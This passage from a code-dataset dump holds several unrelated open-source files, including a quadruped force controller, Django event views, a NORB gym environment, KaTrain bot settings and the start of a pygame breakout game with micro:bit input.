world\n Rz = vertcat(horzcat(cos(th[2]), -sin(th[2]), 0), horzcat(sin(th[2]), cos(th[2]), 0), horzcat(0, 0, 1))\n Ry = vertcat(horzcat(cos(th[1]), 0, sin(th[1])), horzcat(0, 1, 0), horzcat(-sin(th[1]), 0, cos(th[1])))\n Rx = vertcat(horzcat(1, 0, 0), horzcat(0, cos(th[0]), -sin(th[0])), horzcat(0, sin(th[0]), cos(th[0])))\n\n R = mtimes(Rz, mtimes(Ry, Rx))\n\n return R\n\n def dyanmic_matrix_A(self, thx, thy, thz):\n # note, thy and thz are from the reference trajectories (we may also average them like in the paper,\n # but in this code I decided not to) - the matrix was changed from how it is written in the paper,\n # with gravity term, instead, inside the A matrix)\n R = self.rotation_matrix_body_world(thx, thy, thz)\n\n # equation 16 (gravity term has been incorporated into the A matrix for convenience)\n A = vertcat(horzcat(self.zero_mat, self.zero_mat, transpose(R), self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.identity),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat))\n\n return A\n\n def dynamic_matrix_B(self, thx, thy, thz, p1, p2, p3, p4):\n # thy, thz is pitch and yaw for the body to world rotation. 
I is the inertia matrix in the base/body\n # frame, r is the center of mass position of the robot, p1, p2, p3, and p4 are the footstep positions\n\n # we calculate the inertia tensor in the world frame, and then invert it (equations 15-16)\n R = self.rotation_matrix_body_world(thx, thy, thz)\n I_hat = mtimes(R, mtimes(self.I, transpose(R)))\n I_hat_inv = inv(I_hat)\n\n p1 = mtimes(R, p1)\n p2 = mtimes(R, p2)\n p3 = mtimes(R, p3)\n p4 = mtimes(R, p4)\n\n d1 = skew(vertcat(p1[0], p1[1], p1[2]))\n d2 = skew(vertcat(p2[0], p2[1], p2[2]))\n d3 = skew(vertcat(p3[0], p3[1], p3[2]))\n d4 = skew(vertcat(p4[0], p4[1], p4[2]))\n\n # calculate matrix B (equation 16)\n B = vertcat(horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(mtimes(I_hat_inv, d1), mtimes(I_hat_inv, d2), mtimes(I_hat_inv, d3), mtimes(I_hat_inv, d4)),\n horzcat(self.identity_m, self.identity_m, self.identity_m, self.identity_m))\n\n return B\n\n def initialize_solver(self):\n # initiate objective function into solver\n opts = {'printLevel': \"none\"}\n self.opti.minimize(self.cost)\n self.opti.solver('qpoases', opts)\n\ndef rotation_matrix_body_world_numpy(thx, thy, thz):\n # thx,thy,thz = thx[0],thy[0],thz[0]\n # rotation matrix of body to world\n th = np.array([thx, thy, thz])\n Rz = np.vstack((np.hstack((np.cos(th[2]), -np.sin(th[2]), 0)), np.hstack((np.sin(th[2]), np.cos(th[2]), 0)), np.hstack((0, 0, 1))))\n Ry = np.vstack((np.hstack((np.cos(th[1]), 0, np.sin(th[1]))), np.hstack((0, 1, 0)), np.hstack((-np.sin(th[1]), 0, np.cos(th[1])))))\n Rx = np.vstack((np.hstack((1, 0, 0)), np.hstack((0, np.cos(th[0]), -np.sin(th[0]))), np.hstack((0, np.sin(th[0]), np.cos(th[0])))))\n\n R = np.matmul(Rz, np.matmul(Ry, Rx))\n\n return R\n\n# calculates P Matrix below\nzero_mat = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])\n# identity matrix\nidentity = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])\n# robot mass\nrobot_m = 8.8\n# identity over mass matrix\nidentity_m = np.array([[1 / robot_m, 0, 0], [0, 1 / robot_m, 0],\n [0, 0, 1 / robot_m ]])\nA = np.vstack((np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, identity)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat))))\nB = np.vstack((np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((identity_m, identity_m, identity_m, identity_m))))\n# set the rotational inertia matrix of the robot in the body frame\nPx = 55303643.08 / (10 ** 9)\nPy = 60119440.34 / (10 ** 9)\nPz = 105304340.05 / (10 ** 9)\nI = np.array([[Px, 0, 0], [0, Py, 0], [0, 0, Pz]])\nI_identity = np.eye(12, 12)\ng = np.array([0, 0, 0, 0,0,0,0,0,0,0,0,-9.81]).reshape(12,1)\n\ndef skew_numpy(x):\n return np.array([[0, -x[2][0], x[1][0]],\n [x[2][0], 0, -x[0][0]],\n [-x[1][0], x[0][0], 0]])\n\ndef next_state(cur_state, cur_footstep, control_t, dt):\n R = rotation_matrix_body_world_numpy(cur_state[0], cur_state[1], cur_state[2])\n A[0:3, 6:9] = np.transpose(R)\n I_hat = np.matmul(R, np.matmul(I, np.transpose(R)))\n I_hat_inv = np.linalg.inv(I_hat)\n cur_footstep[0:3] = np.matmul(R, cur_footstep[0:3].reshape(3, 1)).reshape(3, 1)\n cur_footstep[3:6] = np.matmul(R, cur_footstep[3:6].reshape(3, 1)).reshape(3, 1)\n cur_footstep[6:9] = np.matmul(R, cur_footstep[6:9].reshape(3, 1)).reshape(3, 1)\n cur_footstep[9:12] = 
np.matmul(R, cur_footstep[9:12].reshape(3, 1)).reshape(3, 1)\n\n d1 = skew_numpy(np.vstack((cur_footstep[0, 0], cur_footstep[1, 0], cur_footstep[2, 0])))\n d2 = skew_numpy(np.vstack((cur_footstep[3, 0], cur_footstep[4, 0], cur_footstep[5, 0])))\n d3 = skew_numpy(np.vstack((cur_footstep[6, 0], cur_footstep[7, 0], cur_footstep[8, 0])))\n d4 = skew_numpy(np.vstack((cur_footstep[9, 0], cur_footstep[10, 0], cur_footstep[11, 0])))\n\n B[6:9, 0:3] = np.matmul(I_hat_inv, d1)\n B[6:9, 3:6] = np.matmul(I_hat_inv, d2)\n B[6:9, 6:9] = np.matmul(I_hat_inv, d3)\n B[6:9, 9:] = np.matmul(I_hat_inv, d4)\n\n state = np.matmul(I_identity + A * dt, cur_state) + np.matmul(B * dt, control_t) + dt * g\n\n return state","repo_name":"AlexS28/OptiState","sub_path":"misc/force_controller.py","file_name":"force_controller.py","file_ext":"py","file_size_in_byte":14327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24312944671","text":"def check(s,l):\r\n while(l>0):\r\n r=l%10\r\n if r not in s:\r\n return False\r\n l=l//10\r\n return True\r\n \r\nn=int(input())\r\ni=1\r\nt=1\r\ns=[0,1,2,5,6,8,9]\r\nwhile(t<=n):\r\n if check(s,i):\r\n t+=1\r\n i+=1\r\nprint(i-1)","repo_name":"Gamana05/typeface","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32395310566","text":"import json\nfrom zavod import settings\nfrom zavod.meta import Dataset\nfrom zavod.store import get_view\nfrom zavod.crawl import crawl_dataset\nfrom zavod.exporters import export_dataset\n\n\ndef test_metadata_collection_export(testdataset1: Dataset, collection: Dataset) -> None:\n ds_path = settings.DATA_PATH / \"datasets\" / testdataset1.name\n crawl_dataset(testdataset1)\n view = get_view(testdataset1)\n export_dataset(testdataset1, view)\n assert ds_path.is_dir()\n catalog_path = ds_path / \"catalog.json\"\n assert not catalog_path.is_file()\n index_path = ds_path / \"index.json\"\n assert index_path.is_file()\n\n with open(index_path, \"r\") as fh:\n index = json.load(fh)\n assert index[\"updated_at\"] == settings.RUN_TIME_ISO\n assert len(index[\"resources\"]) > 2\n\n collection_path = settings.DATA_PATH / \"datasets\" / collection.name\n view = get_view(collection)\n export_dataset(collection, view)\n assert collection_path.is_dir()\n catalog_path = collection_path / \"catalog.json\"\n assert catalog_path.is_file()\n\n with open(catalog_path, \"r\") as fh:\n catalog = json.load(fh)\n\n assert catalog[\"updated_at\"] == settings.RUN_TIME_ISO\n assert len(catalog[\"datasets\"]) == len(collection.datasets)\n for ds in catalog[\"datasets\"]:\n assert ds[\"updated_at\"] == settings.RUN_TIME_ISO\n if ds[\"name\"] in (collection.name, testdataset1.name):\n assert len(ds[\"resources\"]) > 2\n","repo_name":"opensanctions/opensanctions","sub_path":"zavod/zavod/tests/exporters/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"43"} +{"seq_id":"21518922340","text":"from PageObjectLibrary import PageObject\nimport time\n\n\nclass eshop_sharedComponents(PageObject):\n ebook_category = \"st_advanced_ma_6\"\n ebook_category_page_text = \"//h1/span[contains(text(), 'Elektronické čtečky knih')]\"\n shopping_cart_button = \"id:blockcart_top_wrap\"\n shopping_cart_item_count = \"//a[@id='shopping_cart']/div//span[contains(@class, 
'ajax_cart_quantity amount_circle')]\"\n shopping_cart_item_check = \"//a[@id='shopping_cart']/div//span[contains(text(), {item_count})]\"\n\n def wait_for_eshop_homepage(self):\n \"\"\"Wait until eshop homepage is loaded.\"\"\"\n self.selib.wait_until_page_contains(\"Acomp\", 10)\n\n def click_ebook_category_button(self):\n \"\"\"Click ebook category button.\"\"\"\n self.selib.click_element(self.ebook_category)\n self.selib.wait_until_page_contains_element(self.ebook_category_page_text, 10)\n\n def click_shopping_cart_button(self):\n \"\"\"Click shopping cart button.\"\"\"\n self.selib.click_element(self.shopping_cart_button)\n self.selib.wait_until_page_contains(\"Váš nákupní košík\", 10)\n\n def get_shopping_cart_item_count(self):\n \"\"\"Returns number of items in shopping cart.\"\"\"\n return int(self.selib.get_text(self.shopping_cart_item_count))\n\n def verify_shopping_cart_item_count(self, item_count, timeout=5):\n \"\"\"\n Verify that shopping cart item count is equal to given item count.\n :param item_count: expected number of items in shopping cart\n :param timeout: timeout in seconds\n :rtype boolean\n :returns true if expected number of items is in the shopping cart\n \"\"\"\n i = 0\n verified = False\n while i <= timeout:\n shopping_cart_item_check_locator = self.shopping_cart_item_check.replace(\"{item_count}\", str(item_count))\n verified = self.selib.get_element_count(shopping_cart_item_check_locator) > 0\n if verified:\n break\n else:\n time.sleep(1)\n i += 1\n if verified is False:\n print(\"Shopping cart item count was not verified!\")\n return verified\n","repo_name":"Swan31/msd","sub_path":"eshop/pageobjects/eshop_sharedComponents.py","file_name":"eshop_sharedComponents.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32018721239","text":"import sys, os\nfrom chameleon.zpt import loader\n\ndef template(name):\n frame = sys._getframe(1)\n template_path = os.path.join(\n os.path.dirname(\n frame.f_globals['__file__'])\n )\n template_loader = loader.TemplateLoader(\n template_path,\n auto_reload=os.environ['SERVER_SOFTWARE'].startswith('Dev')\n )\n frame.f_locals['template'] = template_loader.load(name)\n\n\ndef require(name):\n frame = sys._getframe(1)\n frame.f_locals['permission_required'] = name\n","repo_name":"kagesenshi/componentae","sub_path":"componentae/directive.py","file_name":"directive.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"13844241963","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import AuthenticationFailed\nimport jwt\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db.models import Q\n\nfrom .serializers import EventSerializer, User2EventSerialzier, UserEventPreferencesSerializer\nfrom .models import Event, UserEventPreferences, User2Event\nfrom users.models import User\nfrom groups.models import Group, Event2Group\nfrom groups.serializers import GroupSerializer, Event2GroupSerializer\nfrom users.serializers import UserSerializer\nfrom functions.getUser import getUser\n\n\n# Create your views here.\n\nclass EventCreationView(APIView):\n def post(self, request):\n user = getUser(request)\n if user == None:\n return Response(status=400)\n userId = user.id\n request.data.update({\"owner\":userId}) \n \n 
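# translate the submitted group title into its primary key, since the serializer stores the group by id\n        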
eventGroupName = request.data.get('eventGroup')\n eventGroup = Group.objects.filter(title = eventGroupName).first()\n eventGroupId = eventGroup.id\n \n request.data.pop(\"eventGroup\")\n request.data.update({\"eventGroup\": eventGroupId})\n \n print(request.data) #['id', 'title', 'location', 'owner', 'date', 'eventType', 'eventGroup', 'coverImg']\n \n serializer = EventSerializer(data=request.data)\n if serializer.is_valid() == False:\n print(serializer.errors)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n \nclass EventSingularGetViaIdView(APIView):\n def post(self, request):\n requId = request.data['id']\n event = Event.objects.filter(id = requId).first()\n serializer = EventSerializer(event, many=False)\n return Response(data=serializer.data)\n\nclass EventCollectionView(APIView):\n def post(self, request): # credentails\n user = getUser(request)\n if user == None:\n return Response(status=400)\n filterEvents = None\n \n if request.data.get('isBaisedOnGroup'):\n groupTitle = request.data.get('groupTitle')\n group = Group.objects.filter(title=groupTitle).first()\n print(group)\n \n event2Groups = Event2Group.objects.filter(group=group.id)\n \n ids = []\n for e in event2Groups:\n ids.append(e.event.id)\n else:\n if request.data.get('excludeDisliked'):\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isDisliked=True)\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isDisliked=True)\n print(filterEvents)\n elif request.data.get('isOnlyDisliked'):\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isDisliked=True)\n elif request.data.get('isOnlyLiked'):\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isLiked=True)\n else:\n events = Event.objects.all()\n serializer = EventSerializer(events, many=True)\n return Response(data=serializer.data)\n ids = []\n if filterEvents != None:\n for e in filterEvents:\n ids.append(e.event.id)\n \n events = None\n \n if request.data.get('excludeDisliked'):\n events = Event.objects.exclude(id__in=ids)\n else:\n events = Event.objects.filter(id__in=ids)\n serializer = EventSerializer(events, many=True)\n return Response(data=serializer.data)\n \nclass EventSingularGetViaTitleView(APIView):\n def post(self, request):\n title = request.data['title']\n event = Event.objects.filter(title = title).first()\n serializer = EventSerializer(event)\n return Response(data=serializer.data)\n \nclass EventUserAssignmentView(APIView):\n # eventTitle, viaEmail, email, isOwner, isCoOwner, isGuest\n def post(self, request):\n \n userId = None\n if request.data['viaEmail'] == True:\n userId = User.objects.filter(email=request.data['email']).first().id\n else:\n user = getUser(request)\n if user == None:\n return Response(status=400)\n userId = user.id\n \n event = Event.objects.filter(title = request.data[\"eventTitle\"]).first()\n if event == None:\n raise \"No Event With that title found\"\n \n \n finalData = {\n \"event\":event.id,\n \"user\":userId,\n \"isOwner\":request.data['isOwner'],\n \"isCoOwner\":request.data['isCoOwner'],\n \"isGuest\":request.data[\"isGuest\"]\n }\n \n seralizer = User2EventSerialzier(data=finalData)\n seralizer.is_valid(raise_exception=True)\n seralizer.save()\n return Response(seralizer.data)\n \nclass UserPreferenceSetView(APIView): # credentails, isLiked, isDisliked, eventTitle\n def post(self, request):\n user = getUser(request)\n if user == None:\n return Response(status=400)\n userId = 
user.id\n user = User.objects.filter(id=userId).first()\n \n eventTitle = request.data.get('eventTitle')\n request.data.pop('eventTitle')\n event = Event.objects.filter(title=eventTitle).first()\n \n request.data.update({'user': user.id})\n request.data.update({'event': event.id})\n \n serializer = UserEventPreferencesSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n \n token = request.COOKIES.get('jwt').split(\"=\")[1].split(\";\")[0]\n print(token)\n \n return Response()#serializer.data)\n \nclass GetMembersFromEvent(APIView):\n def post(self, request):\n eventId = request.data.get('id')\n \n rawGroupsRelations = None\n if request.data.get('isStaffOnly'):\n rawGroupsRelations = User2Event.objects.filter(event=eventId)\n else:\n rawGroupsRelations = User2Event.objects.filter(event=eventId).filter(Q(isOwner=True) | Q(isCoOwner=True))\n \n \n peopleIds = []\n for relation in rawGroupsRelations:\n peopleIds.append(relation.user.id)\n \n rawMembers = User.objects.filter(id__in=peopleIds)\n serializer = UserSerializer(rawMembers, many=True)\n return Response(serializer.data)\n","repo_name":"JonFactor/App-Dev","sub_path":"backend/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11381501236","text":"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.layers import *\nfrom tensorflow.nn import *\nimport numpy as np\nimport sys\nimport os\nimport gym\nfrom gym import spaces\nimport glob\nimport sys\nimport keras as keras\nimport six\nfrom six.moves import cPickle as pickle\nimport scipy as scipy\nimport scipy.io as io\nfrom tqdm import tqdm\n\nlib_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(lib_path)\nimport dataset\n\nfrom keras.models import load_model\nfrom keras.layers import *\nfrom keras import backend as K\nfrom keras.engine.topology import Layer\n\nimport matplotlib as mpl\nimport matplotlib.image as mpimg\nimport random\nfrom matplotlib import pyplot as plt\n\nclass NorbEnv(gym.Env):\n metadata = {'render.modes': ['human', 'rgb_array']}\n max_index = 972\n min_index = 0\n num_actions = 4\n my_path = os.path.abspath(os.path.dirname(__file__))\n dataset_loc = os.path.join(my_path, 'dataset_norb.p')\n max_ep_time = 1500\n scenarios = ['dense_reward', 'sparse_reward', 'one_shot']\n elevation_angles = 9\n azimuth_angles = 18\n max_traj_len = elevation_angles + azimuth_angles - 2\n \n\n \"\"\"\n Description:\n A toy is turned around (azimuth / elevation changes) until it matches a\n target viewpoint\n Source:\n Our [TNS group, INI, RUB] own creation --- based on the NORB data set\n Observation:\n Type: Numpy Array with shape (96, 96, 4)\n Slice\tData description\n Obs[:, :, 0]\tLeft camera view on current object\n Obs[:, :, 1]\tRight camera view on current object\n Obs[:, :, 2]\tLeft camera view on target object\n Obs[:, :, 3]\tRight camera view on target object\n\n Actions:\n Type: Discrete(4)\n Num\tAction\n 0\t Rotate object 20° on turn table\n 1\t Rotate object -20° on turn table\n 2\t Elevate camera by 5°\n 3\t Lower camera by 5°\n\n Reward:\n Reward is 1 if the viewpoint is the same as the target viewpoint,\n otherwise -1\n Starting State:\n The toy is assigned a random viewpoint and the target viewpoint is found\n Episode Termination:\n (TODO: Add \"Episode length is greater than 200\" if it's clever)\n Solved Requirements\n Considered solved when the current 
viewpoint matches the target\n viewpoint\n \"\"\"\n # template from https://stackoverflow.com/questions/45068568/how-to-create-a-new-gym-environment-in-openai\n\n def __init__(self, scenario=None):\n super(NorbEnv, self).__init__()\n if scenario is None:\n scenario = self.scenarios[0]\n\n if scenario == self.scenarios[2]:\n self.action_space = spaces.MultiDiscrete([self.max_traj_len, self.num_actions])\n else:\n self.action_space = spaces.Discrete(self.num_actions)\n self.observation_space = spaces.Box(0, 255, (96, 96, 4), dtype=np.int)\n self.item = self.set_item(14, 'train')\n self._seed = 42\n self.scenario = scenario\n self.ep_time_left = None\n self.current_index = None\n self.target_index = None\n self.reset()\n\n def seed(self, seed=None):\n self._seed = np.random.randint(np.iinfo(np.int32).max, dtype=np.int32) if seed is None else seed\n\n def step(self, action):\n \"\"\"\n\n Parameters\n ----------\n action :\n\n Returns\n -------\n ob, reward, episode_over, info : tuple\n ob (object) :\n an environment-specific object representing your observation of\n the environment.\n reward (float) :\n amount of reward achieved by the previous action. The scale\n varies between environments, but the goal is always to increase\n your total reward.\n episode_over (bool) :\n whether it's time to reset the environment again. Most (but not\n all) tasks are divided up into well-defined episodes, and done\n being True indicates the episode has terminated. (For example,\n perhaps the pole tipped too far, or you lost your last life.)\n info (dict) :\n diagnostic information useful for debugging. It can sometimes\n be useful for learning (for example, it might contain the raw\n probabilities behind the environment's last state change).\n However, official evaluations of your agent are not allowed to\n use this for learning.\n \"\"\"\n if self.scenario == self.scenarios[2]:\n for a in action:\n self._take_action(a)\n self.ep_time_left == 1 # set episode time to zero effectively\n else:\n self._take_action(action)\n reward = self._get_reward()\n ob = np.stack((self.item[self.current_index].image_lt,\n self.item[self.current_index].image_rt,\n self.item[self.target_index].image_lt,\n self.item[self.target_index].image_rt), axis=2) #ob = self.env.getState()\n self.ep_time_left -= 1\n if self.ep_time_left == 0:\n episode_over = True\n else:\n over, _ = self._is_close()\n episode_over = over\n\n\n return ob, reward, episode_over, {}\n\n def reset(self):\n self.current_index = np.random.randint(self.max_index)\n self.target_index = np.random.randint(self.max_index)\n ob = np.stack((self.item[self.current_index].image_lt,\n self.item[self.current_index].image_rt,\n self.item[self.target_index].image_lt,\n self.item[self.target_index].image_rt), axis=2)\n ##ob = ob[np.newaxis, np.newaxis, :]\n self._seed = np.random.rand()\n self.ep_time_left = self.max_ep_time\n return ob\n\n def render(self, mode='human', close=False):\n if mode == 'human':\n plt.imshow(np.concatenate([self.item[self.current_index].image_lt, self.item[self.target_index].image_lt], axis=1))\n plt.ion()\n plt.pause(0.00001)\n if mode == 'rgb_array':\n return self.item[self.current_index].image_lt\n\n def _take_action(self, action):\n item = self.item\n b4_idx = self.current_index\n # actions mean in camera hemisphere space: left, right, up, down\n if action == 0:\n after_index = [i for i in range(len(item)) if item[i].azimuth==(item[b4_idx].azimuth+2)%36 and item[i].lighting==item[b4_idx].lighting and item[i].elevation==item[b4_idx].elevation 
]\n if action == 1:\n after_index = [i for i in range(len(item)) if item[i].azimuth==(item[b4_idx].azimuth-2)%36 and item[i].lighting==item[b4_idx].lighting and item[i].elevation==item[b4_idx].elevation ]\n if action == 2:\n after_index = [i for i in range(len(item)) if item[i].azimuth==item[b4_idx].azimuth and item[i].lighting==item[b4_idx].lighting and item[i].elevation==(min(8, item[b4_idx].elevation+1)) ]\n if action == 3:\n after_index = [i for i in range(len(item)) if item[i].azimuth==item[b4_idx].azimuth and item[i].lighting==item[b4_idx].lighting and item[i].elevation==(max(0, item[b4_idx].elevation-1)) ]\n try: self.current_index = after_index[0]\n except: print(after_index)\n\n def _viewpoint_dist(self, vp1, vp2):\n # ignore lighting conditions\n return abs(vp1.elevation - vp2.elevation) + min(36 - abs(vp1.azimuth - vp2.azimuth), abs(vp1.azimuth - vp2.azimuth))\n\n def _is_close(self):\n i = self.current_index\n t = self.target_index\n dist = self._viewpoint_dist(self.item[i], self.item[t])\n return np.isclose(dist, 0), dist\n\n def _get_reward(self):\n close, dist = self._is_close()\n reward = 0\n\n if close:\n reward = 2\n else:\n if self.scenario == self.scenarios[0]: # dense rewards\n reward = -1 * dist/50.\n else: # sparse rewards or one-shot\n reward = 0\n\n return reward\n\n\n def set_item(self, seq_no, instance):\n try:\n dataset = pickle.load(open(self.dataset_loc, 'rb'))\n lists = dataset.group_dataset_by_category_and_instance(instance)\n del dataset\n return lists[seq_no]\n except:\n print('Please provide norb dataset at location \\\"{}\\\"'.format(self.dataset_loc))\n quit(-1)\n\n","repo_name":"wiskott-lab/gym-norb","sub_path":"norb/norb.py","file_name":"norb.py","file_ext":"py","file_size_in_byte":8526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"72783009091","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\n\nif ( len(sys.argv) == 1 ):\n print(\"Use full directory path as an argument.\\n Example:\")\n print(sys.argv[0],\"/home/user/git/repository/\")\n exit() \n\npath = sys.argv[1]\n\n#print( 'Number of arguments',len(sys.argv) )\n#print( 'Is directory', os.path.isdir(sys.argv[1]) )\nif os.path.isdir(sys.argv[1]):\n bash_command = [\"cd \"+path, \"git status\"]\n result_os = os.popen(' && '.join(bash_command)).read()\n #is_change = False\n for result in result_os.split('\\n'):\n if result.find('modified') != -1:\n prepare_result = result.replace('\\tmodified: ', '')\n print(path+prepare_result)\n # break\nelse:\n print(\"Use full directory path as an argument.\\n Example:\")\n print(sys.argv[0],\"/home/user/git/repository/\")\n exit()\n\n","repo_name":"bvmspb/devops-netology","sub_path":"04_script_02_py/04_02_03.py","file_name":"04_02_03.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73681096450","text":"import sys\n\nfrom katrain.core.base_katrain import KaTrainBase, Player\nfrom katrain.core.constants import *\n\nDEFAULT_PORT = 8587\n\n\nclass Logger(KaTrainBase):\n def __init__(self, debug_level=0, output_level=OUTPUT_INFO):\n super().__init__(force_package_config=True, debug_level=debug_level)\n self.output_level = output_level\n\n def log(self, msg, level=OUTPUT_INFO):\n if level <= self.output_level:\n print(msg, file=sys.stderr)\n\n\nbot_strategies = {\n \"dev\": (\n AI_SIMPLE_OWNERSHIP,\n {\"max_points_lost\": 2.0, \"settled_weight\": 1.0, \"opponent_fac\": 0.5},\n 
{\"max_visits\": 500},\n ),\n \"dev-beta\": (\n AI_SIMPLE_OWNERSHIP,\n {\"max_points_lost\": 1.75, \"settled_weight\": 1.0, \"opponent_fac\": 0.5},\n {\"max_visits\": 500, \"wide_root_noise\": 0.02},\n ),\n \"strong\": (\n AI_SIMPLE_OWNERSHIP,\n {\"max_points_lost\": 1.1, \"settled_weight\": 1.0, \"opponent_fac\": 0.5, \"min_visits\": 3},\n {\"max_visits\": 1000,\"wide_root_noise\": 0.02},\n ),\n # \"dev\": (AI_SCORELOSS, {\"strength\": 0.5}, {\"max_visits\": 500}),\n # \"dev\": (AI_WEIGHTED, {\"weaken_fac\": 0.5},{}),\n \"balanced\": (AI_SCORELOSS, {\"strength\": 0.35}, {\"max_visits\": 500}), # 1d?\n \"territory\": (AI_TERRITORY, {}, {}),\n # \"dev\": (AI_POLICY, {}, {}),\n #\"strong\": (AI_POLICY, {}, {}),\n \"weak\": (AI_DEFAULT, {}, {\"max_visits\": 500,'max_time':15}),\n \"influence\": (AI_INFLUENCE, {}, {}),\n # \"balanced\": (AI_PICK, {}, {}),\n \"weighted\": (AI_WEIGHTED, {}, {\"weaken_fac\": 1.0}),\n \"local\": (AI_LOCAL, {}, {}),\n \"tenuki\": (AI_TENUKI, {}, {}),\n \"18k\": (AI_RANK, {\"kyu_rank\": 18}, {}),\n \"14k\": (AI_RANK, {\"kyu_rank\": 14}, {}),\n \"10k\": (AI_RANK, {\"kyu_rank\": 10}, {}),\n \"6k\": (AI_RANK, {\"kyu_rank\": 6}, {}),\n \"2k\": (AI_RANK, {\"kyu_rank\": 2}, {}),\n \"2d\": (AI_RANK, {\"kyu_rank\": -1}, {}),\n}\n\nengine_overrides = {\"dev\": {\"maxVisits\": 500}}\n\ngreetings = {\n \"dev\": \"Play in a way that simplifies the game.\",\n \"dev-beta\": \"Play in a way that simplifies the game.\",\n #\"strong\": \"Play top policy move.\",\n \"strong\": \"Play simple.\",\n \"weak\": \"Utility function inversed.\",\n \"influence\": \"Play an influential style.\",\n \"territory\": \"Play a territorial style.\",\n # \"balanced\": \"Play the best move out of a random selection.\",\n \"balanced\": \"Having a mid-life crisis and now plays in a way that complicates the game.\",\n \"weighted\": \"Play a policy-weighted move.\",\n \"local\": \"Prefer local responses.\",\n \"tenuki\": \"Prefer to tenuki.\",\n \"18k\": \"Calibrated version of katrain-balanced for ~18k\",\n \"14k\": \"Calibrated version of katrain-balanced for ~14k\",\n \"10k\": \"Calibrated version of katrain-balanced for ~10k\",\n \"6k\": \"Calibrated version of katrain-balanced for ~6k\",\n \"2k\": \"Calibrated version of katrain-balanced for ~2k\",\n \"2d\": \"Calibrated version of katrain-balanced for ~2d\",\n}\n","repo_name":"sanderland/katrain-bots","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"19815121984","text":"from re import L, X\r\nimport sys, pygame, random\r\nfrom typing import ByteString\r\nimport serial, time\r\nimport threading, queue\r\nimport time\r\nimport keyboard\r\n\r\n\r\n\r\nq = queue.Queue()\r\n#inizializzo variabili per la grafica\r\nGAME_OVER = pygame.image.load('gameOver.png')\r\nGAME_OVER = pygame.transform.scale(GAME_OVER,(350, 350))\r\nWIN = pygame.image.load('vittoria.png')\r\nWIN = pygame.transform.scale(WIN ,(380, 327))\r\nSFONDO_MENU = pygame.image.load('background.png')\r\nSFONDO_MENU = pygame.transform.scale(SFONDO_MENU,(640,480))\r\n\r\n#parte dei thread\r\nclass Read_Microbit(threading.Thread):\r\n def __init__(self):\r\n threading.Thread.__init__(self)\r\n self._running = True\r\n \r\n def terminate(self):\r\n self._running = False\r\n \r\n def run(self):\r\n #serial config\r\n port = \"COM10\"\r\n s = serial.Serial(port)\r\n s.baudrate = 115200\r\n while self._running:\r\n data = s.readline().decode() \r\n 
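# drop the leading framing character and the trailing three characters, then parse the comma-separated accelerometer values\r\n            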
acc = [float(x) for x in data[1:-3].split(\",\")]\r\n q.put(acc)\r\n time.sleep(0.01)\r\n\r\n#classe per il muro composto da mattoncini\r\nclass Wall():\r\n\r\n def __init__(self):\r\n #carico immagine mattone\r\n self.brick = pygame.image.load(\"brick.png\") \r\n brickrect = self.brick.get_rect()\r\n #lunghezza e altezza del mattone\r\n self.bricklength = brickrect.right - brickrect.left \r\n self.brickheight = brickrect.bottom - brickrect.top \r\n #funzione per la costruzione del muro\r\n def build_wall(self, width): \r\n xpos = 0\r\n ypos = 60\r\n k = 0\r\n self.brickrect = []\r\n #52 è il numero dei mattoncini che compongono il muro\r\n for i in range (0, 52): \r\n if xpos > width:\r\n if k == 0:\r\n k = self.bricklength / 2#impostazione sfalsata\r\n else:\r\n k = 0\r\n xpos = -k\r\n ypos += self.brickheight\r\n \r\n self.brickrect.append(self.brick.get_rect()) \r\n self.brickrect[i] = self.brickrect[i].move(xpos, ypos)\r\n xpos = xpos + 